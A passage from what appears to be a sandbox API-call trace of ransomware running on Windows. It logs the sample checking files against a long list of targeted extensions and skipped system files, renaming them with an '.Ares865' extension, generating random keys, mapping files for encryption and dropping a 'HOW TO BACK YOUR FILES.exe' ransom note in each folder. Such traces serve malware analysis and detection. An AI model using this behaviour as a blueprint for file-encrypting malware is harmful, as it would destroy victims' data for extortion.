[0087.454] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.454] lstrlenW (lpString="idb") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.454] lstrlenW (lpString="ihx") returned 3 [0087.454] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.454] lstrlenW (lpString="itdb") returned 4 [0087.455] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.455] lstrlenW (lpString="itw") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.455] lstrlenW (lpString="jet") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.455] lstrlenW (lpString="jtx") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.455] lstrlenW (lpString="kdb") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.455] lstrlenW (lpString="kexi") returned 4 [0087.455] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.455] lstrlenW (lpString="kexic") returned 5 [0087.455] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.455] lstrlenW (lpString="kexis") returned 5 [0087.455] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.455] lstrlenW (lpString="lgc") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.455] lstrlenW (lpString="lwx") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.455] lstrlenW (lpString="maf") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.455] lstrlenW (lpString="maq") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.455] lstrlenW (lpString="mar") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.455] lstrlenW (lpString="marshal") returned 7 [0087.455] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.455] lstrlenW (lpString="mas") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.455] lstrlenW (lpString="mav") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.455] lstrlenW (lpString="maw") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.455] lstrlenW (lpString="mdbhtml") returned 7 [0087.455] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.455] lstrlenW (lpString="mdn") returned 3 [0087.455] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.455] lstrlenW (lpString="mdt") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.456] lstrlenW (lpString="mfd") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.456] lstrlenW (lpString="mpd") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.456] lstrlenW (lpString="mrg") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.456] lstrlenW (lpString="mud") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.456] lstrlenW (lpString="mwb") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.456] lstrlenW (lpString="myd") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.456] lstrlenW (lpString="ndf") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.456] lstrlenW (lpString="nnt") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.456] lstrlenW (lpString="nrmlib") returned 6 [0087.456] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.456] lstrlenW (lpString="ns2") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.456] lstrlenW (lpString="ns3") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.456] lstrlenW (lpString="ns4") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.456] lstrlenW (lpString="nsf") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.456] lstrlenW (lpString="nv") returned 2 [0087.456] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.456] lstrlenW (lpString="nv2") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.456] lstrlenW (lpString="nwdb") returned 4 [0087.456] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.456] lstrlenW (lpString="nyf") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.456] lstrlenW (lpString="odb") returned 3 [0087.456] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.456] lstrlenW (lpString="odb") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.457] lstrlenW (lpString="oqy") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.457] lstrlenW (lpString="ora") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.457] lstrlenW (lpString="orx") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.457] lstrlenW (lpString="owc") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.457] lstrlenW (lpString="p96") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.457] lstrlenW (lpString="p97") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.457] lstrlenW (lpString="pan") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.457] lstrlenW (lpString="pdb") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.457] lstrlenW (lpString="pdm") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.457] lstrlenW (lpString="pnz") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.457] lstrlenW (lpString="qry") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.457] lstrlenW (lpString="qvd") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.457] lstrlenW (lpString="rbf") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.457] lstrlenW (lpString="rctd") returned 4 [0087.457] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.457] lstrlenW (lpString="rod") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.457] lstrlenW (lpString="rodx") returned 4 [0087.457] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.457] lstrlenW (lpString="rpd") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.457] lstrlenW (lpString="rsd") returned 3 [0087.457] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.458] lstrlenW (lpString="sas7bdat") returned 8 [0087.458] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.458] lstrlenW (lpString="sbf") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.458] lstrlenW (lpString="scx") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.458] lstrlenW (lpString="sdb") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.458] lstrlenW (lpString="sdc") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.458] lstrlenW (lpString="sdf") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.458] lstrlenW (lpString="sis") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.458] lstrlenW (lpString="spq") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.458] lstrlenW (lpString="te") returned 2 [0087.458] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.458] lstrlenW (lpString="teacher") returned 7 [0087.458] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.458] lstrlenW (lpString="tmd") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.458] lstrlenW (lpString="tps") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.458] lstrlenW (lpString="trc") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.458] lstrlenW (lpString="trc") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.458] lstrlenW (lpString="trm") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.458] lstrlenW (lpString="udb") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.458] lstrlenW (lpString="udl") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.458] lstrlenW (lpString="usr") returned 3 [0087.458] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.458] lstrlenW (lpString="v12") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.459] lstrlenW (lpString="vis") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.459] lstrlenW (lpString="vpd") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.459] lstrlenW (lpString="vvv") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.459] lstrlenW (lpString="wdb") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.459] lstrlenW (lpString="wmdb") returned 4 [0087.459] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.459] lstrlenW (lpString="wrk") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.459] lstrlenW (lpString="xdb") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.459] lstrlenW (lpString="xld") returned 3 [0087.459] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.459] lstrlenW (lpString="xmlff") returned 5 [0087.459] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.Ares865") returned 80 [0087.459] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.460] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.460] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14688) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.461] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.462] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c60, lpName=0x0) returned 0x15c [0087.463] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c60) returned 0x190000 [0087.464] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.466] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.466] CloseHandle (hObject=0x15c) returned 1 [0087.466] CloseHandle (hObject=0x118) returned 1 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.466] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0087.466] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0087.466] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0087.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036" [0087.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0087.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0087.467] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned 51 [0087.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036" [0087.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0087.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\how to back your files.exe"), bFailIfExists=1) returned 0 [0087.467] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0087.467] GetLastError () returned 0x0 [0087.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0087.468] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0087.468] CloseHandle (hObject=0x120) returned 1 [0087.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0087.468] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0087.468] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0087.468] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0087.468] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0087.468] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.468] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.468] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0087.468] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0087.468] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0087.468] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.468] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".") returned 1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="..") returned 1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="windows") returned -1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="temp") returned -1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="boot") returned 1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ids.txt") returned -1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="MSBuild") returned -1 [0087.469] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0087.469] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*") returned 53 [0087.469] lstrcpyW (in: lpString1=0x2cce468, lpString2="ENVELOPR.DLL.trx_dll" | out: lpString1="ENVELOPR.DLL.trx_dll") returned="ENVELOPR.DLL.trx_dll" [0087.469] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0087.469] lstrlenW (lpString="Ares865") returned 7 [0087.469] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.469] lstrlenW (lpString=".dll") returned 4 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".dll") returned 1 [0087.469] lstrlenW (lpString=".lnk") returned 4 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.469] lstrlenW (lpString=".ini") returned 4 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".ini") returned 1 [0087.469] lstrlenW (lpString=".sys") returned 4 [0087.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".sys") returned 1 [0087.469] lstrlenW (lpString="ENVELOPR.DLL.trx_dll") returned 20 [0087.469] lstrlenW (lpString="bak") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.469] lstrlenW (lpString="ba_") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.469] lstrlenW (lpString="dbb") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.469] lstrlenW (lpString="vmdk") returned 4 [0087.469] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.469] lstrlenW (lpString="rar") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.469] lstrlenW (lpString="zip") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.469] lstrlenW (lpString="tgz") returned 3 [0087.469] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.469] lstrlenW (lpString="vbox") returned 4 [0087.469] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.469] lstrlenW (lpString="vdi") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.470] lstrlenW (lpString="vhd") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.470] lstrlenW (lpString="vhdx") returned 4 [0087.470] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.470] lstrlenW (lpString="avhd") returned 4 [0087.470] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.470] lstrlenW (lpString="db") returned 2 [0087.470] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.470] lstrlenW (lpString="db2") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.470] lstrlenW (lpString="db3") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.470] lstrlenW (lpString="dbf") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.470] lstrlenW (lpString="mdf") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.470] lstrlenW (lpString="mdb") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.470] lstrlenW (lpString="sql") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.470] lstrlenW (lpString="sqlite") returned 6 [0087.470] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.470] lstrlenW (lpString="sqlite3") returned 7 [0087.470] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.470] lstrlenW (lpString="sqlitedb") returned 8 [0087.470] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.470] lstrlenW (lpString="xml") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.470] lstrlenW (lpString="$er") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.470] lstrlenW (lpString="4dd") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.470] lstrlenW (lpString="4dl") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.470] lstrlenW (lpString="^^^") returned 3 [0087.470] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.470] lstrlenW (lpString="abs") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.471] lstrlenW (lpString="abx") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.471] lstrlenW (lpString="accdb") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.471] lstrlenW (lpString="accdc") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.471] lstrlenW (lpString="accde") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.471] lstrlenW (lpString="accdr") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.471] lstrlenW (lpString="accdt") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.471] lstrlenW (lpString="accdw") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.471] lstrlenW (lpString="accft") returned 5 [0087.471] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.471] lstrlenW (lpString="adb") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.471] lstrlenW (lpString="adb") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.471] lstrlenW (lpString="ade") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.471] lstrlenW (lpString="adf") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.471] lstrlenW (lpString="adn") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.471] lstrlenW (lpString="adp") returned 3 [0087.471] lstrcmpiW 